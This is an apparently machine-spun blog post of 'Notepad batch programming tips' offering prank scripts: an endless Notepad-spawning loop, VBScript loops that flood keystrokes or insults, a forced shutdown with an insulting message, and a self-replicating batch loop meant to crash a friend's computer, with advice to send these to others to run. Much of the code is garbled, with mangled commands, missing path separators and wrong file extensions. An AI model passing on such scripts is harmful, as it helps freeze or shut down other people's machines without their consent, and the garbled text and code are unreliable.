October 21, 2024

Baskentmuhendislik

The technology folks

Notepad Batch Programming Awesome Tips

Notepad:

Notepad is a basic text editor for Microsoft Windows included given that 1985 from MIcrosoft Windows 1. .It is like notebook page for windows people.It’s supports quite a few programming languages like c, c++, java, batch programming an quite a few more.

Batch file:

In Windows, Batch file is a file made up of scequence of command for a computer running procedure in a code/programming identified as batch programming.It’s is most popular language for creating viruses mainly because in batch programming it is really simple to make a virus and operate it on any computer that has windows and DOS.The ideal usually identified DOS batch file is the AUTOEXEC.BAT file that initializes DOS when you start the procedure.

Today I am heading to share several Notepad batch programming methods. They are truly neat and outrageous one’s. So Make sure you believe atleast 3 to 4 situations to use them on your Personal computer or your mates Personal computer.

Unlimited NOTEPAD Windows HACK :

This will pop up countless notepads until finally the computer freezes and crashes. Duplicate the underneath

code in notepad and save it as “.vbs” extension.

Code:-

@ECHO off

:prime

Get started %SystemRoot%system32notepad.exe

GOTO prime

CAPS LOCK Mad TRICK :

This frequently turns caps lock on and off truly rapid consistently.

Code:-

Established wshShell =wscript.CreateObject(“WScript.Shell”)

do

wscript.rest 100

wshshell.sendkeys “CAPSLOCK”

loop

Unlimited BACKSPACE HACK :

This makes it so the backspace essential is frequently being pressed.

Code:-

MsgBox “Let us go back a several steps”

Established wshShell =wscript.CreateObject(“WScript.Shell”)

do

wscript.rest 100

wshshell.sendkeys “bs”

loop

Hack your friend’s keyboard and make him style “You are a idiot” :

simultaneously:

Code:

Established wshShell = wscript.CreateObject(“WScript.Shell”)

do

wscript.rest 100

wshshell.sendkeys “You are a idiot.”

loop

Save it as “just about anything.bat” and deliver to your good friend, if he operates it

Your Friend Keyboard instantly writes “you are a idiot”

Convey your good friend a information and shut down his / her computer:
Code:

@echo off

msg * I you should not like you

shutdown -c “Error! You are too stupid!” -s

Save it as “Something.bat

Crash Your Friend Computer (If you the two are so near buddies) :

To do this very first open notepad and copy the code underneath.
:loop
start joke.bat
Goto loop

Save it as “Something.BAT” in All Data files and operate that file for effect.

Many thanks For Looking through !!! šŸ˜€

Hope You Like It . . .